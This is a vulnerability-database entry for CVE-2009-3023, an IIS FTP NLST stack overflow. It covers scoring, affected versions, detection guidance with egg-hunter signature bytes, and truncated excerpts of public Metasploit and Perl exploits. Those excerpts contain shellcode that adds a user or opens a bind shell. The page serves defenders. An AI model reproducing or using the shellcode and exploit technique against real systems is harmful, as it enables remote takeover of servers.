CVE-2009-3023
Published 2009-08-31
CVE-2009-3023: Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code…
Priority: P2 · 75 · critical · 9 (CVSS 2.0)
CVSS 2.0 vector: AV:N / AC:L / Au:S / C:C / I:C / A:C
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 90.91% (99.8th percentile)
Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability."
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_information_server | 5.0 – 6.0 | — |
Detection & IOCs (extracted from sources)
Bytes:
\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0
Bytes:
\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38<egg>\x75\xF7\x40\x40\x40\x40\xFF\xE0
- Detect exploit trigger: FTP NLST command with wildcard path traversal pattern matching '*/../' sent over an active FTP data channel after a CWD into a long directory path.
- Detect exploit staging: multiple FTP SITE commands carrying encoded shellcode (prefixed 'KSEXY') sent to store payload on the stack before the NLST trigger.
- Detect exploit staging: FTP MKD command creating a directory whose name begins with 'w00t' followed by a numeric port value, used to set up the long path required for the overflow.
- Detect egg-hunter signature bytes 0xB8 0x55 0x55 0x52 0x55 0x35 0x55 0x55 0x55 0x55 0x40 0x81 0x38 in FTP command payloads (SITE or MKD arguments) on port 21.
- Detect egg tag 'T00WT00W' in FTP PASS command or SITE command arguments, used as the egghunter marker for the secondary larger payload.
- The exploit requires the FTP server to allow write access; alert on anonymous FTP write access combined with MKD + SITE + NLST wildcard command sequences.
- Payload bad characters for this exploit are \x00\x09\x0c\x20\x0a\x0d\x0b; encoded shellcode in SITE/MKD arguments will avoid these bytes, so use this constraint when writing YARA/Snort rules for payload detection.
- The vulnerability only affects IIS FTP servers where the authenticated (or anonymous) user has write access to the filesystem; servers configured read-only are not exploitable via this vector.
- IIS 6.0 is affected but has stack cookie (GS) protection, which complicates direct exploitation compared to IIS 5.0.
- Return addresses in the public exploits are hardcoded for specific Windows 2000 SP levels and language versions (SP4 English/Italian, SP3 English, SP0-SP3 Japanese); detections based on these ROP gadget addresses are platform-specific.
CVSS provenance
- NVD (CVSS v2.0): 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C
- VulnCheck: 9.0 CRITICAL
GHSA
GHSA-ww4p-6452-jmh8 (ghsa_unreviewed · 2022-05-02): CVE-2009-3023 [HIGH] CWE-120, Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5
VulnCheck
CVE-2009-3023 [CRITICAL] Microsoft Internet Information Services (IIS) Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') (vulncheck · 2009 · CVSS 9.0)
Affected: Microsoft Internet Information Services (IIS)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053
No detection rules found.
Exploit-DB
Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit) (exploitdb · 2010-11-12 · CVE-2009-3023)
---
##
# $Id: ms09_053_ftpd_nlst.rb 11003 2010-11-12 06:19:49Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS FTP Server NLST Response Overflow',
'Description' => %q{
This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP
service. The flaw is triggered when a special NLST argument is passed
while the session has changed into a long directory path. For this exploit
to work, the FTP server must be configured to allow write access
Exploit-DB
Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow (exploitdb · 2009-09-01 · CVE-2009-3023)
---
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x
Exploit-DB
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow (exploitdb · 2009-08-31 · CVE-2009-3023)
---
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x3
Metasploit
MS09-053 Microsoft IIS FTP Server NLST Response Overflow (metasploit)
This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)
No writeups or analysis indexed.
References
- http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ975191
- http://www.exploit-db.com/exploits/9541
- http://www.exploit-db.com/exploits/9559
- http://www.kb.cert.org/vuls/id/276653
- http://www.securityfocus.com/bid/36189
- http://www.us-cert.gov/cas/techalerts/TA09-286A.html
- http://www.vupen.com/english/advisories/2009/2481
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6080